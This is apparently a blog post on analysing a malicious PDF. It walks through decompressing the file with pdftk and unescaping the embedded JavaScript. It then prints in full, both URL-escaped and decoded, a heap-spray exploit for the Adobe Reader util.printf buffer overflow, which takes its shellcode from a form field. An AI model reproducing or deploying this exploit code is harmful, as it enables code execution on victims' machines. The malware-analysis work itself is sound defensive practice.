1. open the file in hex viewer or any text editor/viewer. if the pdf has embedded script which is compressed, it can be checked by the FlateDecode string:
3. use pdftk tool to uncompress the malicious script:
$ pdftk file.pdf output file.pdf.out uncompress
4. the file file.pdf.out now contains the decompressed script. browse the file to locate the (escaped) script:
5. extract the escaped text, and feed to your preferred tool to unescape the code.
Extracted text:
%76%61%72%20%73%63%63%73%20%3D%20%75%6E%65%73%63%61%70%65%28%74%68%69%73%2E%67%65%74%46%69%65%6C%64%28%27%74%65%78%74%27%29%2E%76%61%6C%75%65%29%3B%0D%0A%0D%0A%09%76%61%72%20%62%67%62%6C%20%3D%20%75%6E%65%73%63%61%70%65%28%22%25%75%30%41%30%41%22%2B%22%25%75%30%41%30%41%22%29%3B%0D%0A%09%76%61%72%20%73%6C%73%70%63%20%3D%20%32%30%20%2B%20%73%63%63%73%2E%6C%65%6E%67%74%68%3B%0D%0A%09%77%68%69%6C%65%28%62%67%62%6C%2E%6C%65%6E%67%74%68%20%3C%20%73%6C%73%70%63%29%20%62%67%62%6C%20%2B%3D%20%62%67%62%6C%3B%0D%0A%09%76%61%72%20%66%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%73%6C%73%70%63%29%3B%0D%0A%09%76%61%72%20%62%6C%6B%20%3D%20%62%67%62%6C%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%62%67%62%6C%2E%6C%65%6E%67%74%68%20%2D%20%73%6C%73%70%63%29%3B%0D%0A%09%77%68%69%6C%65%28%62%6C%6B%2E%6C%65%6E%67%74%68%20%2B%20%73%6C%73%70%63%20%3C%20%30%78%36%30%30%30%30%29%20%62%6C%6B%20%3D%20%62%6C%6B%20%2B%20%62%6C%6B%20%2B%20%66%62%6C%6B%3B%0D%0A%0D%0A%09%76%61%72%20%6D%6D%79%20%3D%20%6E%65%77%20%41%72%72%61%79%28%29%3B%0D%0A%09%66%6F%72%28%69%20%3D%20%30%3B%20%69%20%3C%20%31%32%30%30%3B%20%69%2B%2B%29%7B%20%6D%6D%79%5B%69%5D%20%3D%20%62%6C%6B%20%2B%20%73%63%63%73%20%7D%0D%0A%0D%0A%76%61%72%20%6E%6D%20%3D%20%31%32%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%31%38%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%39%22%3B%20%7D%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%32%37%36%3B%69%2B%2B%29%7B%20%6E%6D%20%3D%20%6E%6D%20%2B%20%22%38%22%3B%20%7D%0D%0A%0D%0A%75%74%69%6C%2E%70%72%69%6E%74%66%28%75%6E%65%73%63%61%70%65%28%22%22%2B%22%25%22%2B%22%32%35%25%33%34%25%22%2B%22%33%35%25%33%30%25%33%30%25%33%30%25%36%36%22%29%2C%20%6E%6D%29%3B%0D%0A%0D%0A%74%68%69%73%2E%63%6C%6F%73%65%44%6F%63%28%74%72%75%65%29%3B%0D%0A5.
the output will be decoded as below.
<------------------------------------------------------------------------------
var sccs = unescape(this.getField('text').value);
var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < slspc) bgbl += bgbl;
var fblk = bgbl.substring(0,slspc);
var blk = bgbl.substring(0,bgbl.length - slspc);
while(blk.length + slspc < 0x60000) blk = blk + blk + fblk;
var mmy = new Array();
for(i = 0; i < 1200; i++){ mmy[i] = blk + sccs }
var nm = 12;
for(i=0;i<18;i++){ nm = nm + "9"; }
for(i=0;i<276;i++){ nm = nm + "8"; }
util.printf(unescape(""+"%"+"25%34%"+"35%30%30%30%66"), nm);
this.closeDoc(true);
<------------------------------------------------------------------------------
if you're monitoring latest alerts, it will be familiar with you. its an exploit for PDF's util.printf discovered by coresecurity. see the details: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
Posts
